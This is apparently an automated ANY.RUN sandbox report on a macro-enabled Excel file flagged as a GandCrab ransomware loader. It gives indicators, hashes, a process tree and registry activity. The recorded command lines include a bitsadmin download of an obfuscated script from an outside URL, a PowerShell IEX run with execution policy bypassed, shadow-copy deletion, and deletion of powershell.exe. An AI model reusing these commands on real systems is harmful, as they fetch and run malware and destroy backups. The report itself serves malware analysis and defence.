General Info

File name

SOC test.xlsm

Full analysis
https://app.any.run/tasks/025eaa6b-a45e-4499-b5aa-fdc2eaa2ef64
Verdict
Malicious activity
Analysis date
1/10/2019, 20:53:36
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
ransomware
gandcrab
trojan
Indicators:

MIME:
application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File info:
Microsoft Excel 2007+
MD5

977924ef58a2edda76a9ba8c30cfb07d

SHA1

e172616d1df9b762e9dd7c3f357e3071ebc3a11b

SHA256

88c6b4ef5c42bb66cebf8825d693b58ef78f9c9feef7cd884eef823c78f0639a

SSDEEP

768:NrIjaPdlcZnH938rL40tUYwJgsb19nQFX4aqnRUPegn:V/PdeZdKLttigw9nQFX2UPegn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Dropped file may contain instructions of ransomware
  • powershell.exe (PID: 3596)
Uses BITADMIN.EXE for downloading application
  • EXCEL.EXE (PID: 2972)
Executes scripts
  • EXCEL.EXE (PID: 2972)
Actions looks like stealing of personal data
  • powershell.exe (PID: 3596)
GandCrab keys found
  • powershell.exe (PID: 3596)
Deletes shadow copies
  • powershell.exe (PID: 3596)
Renames files like Ransomware
  • powershell.exe (PID: 3596)
Unusual execution from Microsoft Office
  • EXCEL.EXE (PID: 2972)
Writes file to Word startup folder
  • powershell.exe (PID: 3596)
Connects to CnC server
  • powershell.exe (PID: 3596)
Reads Internet Cache Settings
  • powershell.exe (PID: 3596)
Starts CMD.EXE for commands execution
  • powershell.exe (PID: 3596)
Reads the cookies of Mozilla Firefox
  • powershell.exe (PID: 3596)
Executes PowerShell scripts
  • WScript.exe (PID: 3328)
Creates files like Ransomware instruction
  • powershell.exe (PID: 3596)
Creates files in the user directory
  • WScript.exe (PID: 3328)
  • powershell.exe (PID: 3596)
Reads Microsoft Office registry keys
  • EXCEL.EXE (PID: 2972)
Reads settings of System Certificates
  • powershell.exe (PID: 3596)
Dropped object may contain TOR URL's
  • powershell.exe (PID: 3596)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.xlsm
|   Excel Microsoft Office Open XML Format document (with Macro) (50.8%)
.xlsx
|   Excel Microsoft Office Open XML Format document (30%)
.zip
|   Open Packaging Conventions container (15.4%)
.zip
|   ZIP compressed archive (3.5%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
0x0006
ZipCompression:
Deflated
ZipModifyDate:
1980:01:01 00:00:00
ZipCRC:
0xf3ea132d
ZipCompressedSize:
395
ZipUncompressedSize:
1257
ZipFileName:
[Content_Types].xml
XMP
Creator:
null
XML
LastModifiedBy:
null
CreateDate:
2006:09:16 00:00:00Z
ModifyDate:
2019:01:10 19:53:09Z
Application:
Microsoft Excel
DocSecurity:
None
ScaleCrop:
No
HeadingPairs
null
null
TitlesOfParts:
Sheet1
Company:
null
LinksUpToDate:
No
SharedDoc:
No
HyperlinksChanged:
No
AppVersion:
15.03

Screenshots

Processes

Total processes
46
Monitored processes
7
Malicious processes
3
Suspicious processes
0

Behavior graph

+
start excel.exe no specs bitsadmin.exe no specs wscript.exe no specs #GANDCRAB powershell.exe wmic.exe no specs cmd.exe no specs timeout.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2972
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\scrrun.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\bitsadmin.exe
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\wscript.exe
c:\windows\system32\windowscodecs.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\program files\common files\system\ado\msadox.dll

PID
3344
CMD
"C:\Windows\System32\bitsadmin.exe" /transfer myFile /download /priority normal https://download1591.mediafire.com/50dbuyji2mvg/lqn7rd8dez3cvmc/obfuscated.tmp C:\Users\admin\AppData\Local\Temp\\pepe.js
Path
C:\Windows\System32\bitsadmin.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
BITS administration utility
Version
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\qmgrprxy.dll

PID
3328
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\pepe.js"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\jscript.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\program files\common files\system\ado\msado15.dll
c:\windows\system32\msdart.dll
c:\windows\system32\mlang.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll

PID
3596
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "IEX (([System.IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\tnqalxuybs.log')).Replace('?',''));"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\iconcodecservice.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\credssp.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\cabinet.dll
c:\windows\system32\devrtl.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\oleacc.dll

PID
2884
CMD
"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Path
C:\Windows\system32\wbem\wmic.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
2147749908
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wbem\wmiutils.dll

PID
3960
CMD
"C:\Windows\System32\cmd.exe" /c timeout -c 5 & del "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /f /q
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\timeout.exe

PID
3472
CMD
timeout -c 5
Path
C:\Windows\system32\timeout.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
timeout - pauses command processing
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\timeout.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

Registry activity

Total events
1111
Read events
989
Write events
114
Delete events
8

Modification events

PID
Process
Operation
Key
Name
Value
2972
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
2972
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
2972
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\20EE2E
2972
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
2972
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\20EF28
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
g),
67292C009C0B0000010000000000000000000000
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
9C0B0000148038361EA9D40100000000
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\20EE2E
20EE2E
040000009C0B00002F00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0053004F004300200074006500730074002E0078006C0073006D00000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000000000000F03E29371EA9D4012EEE20002EEE200000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\20EE2E
20EE2E
040000009C0B00002F00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0053004F004300200074006500730074002E0078006C0073006D00000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000000000000F03E29371EA9D4012EEE20002EEE200000000000AC02000000180000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000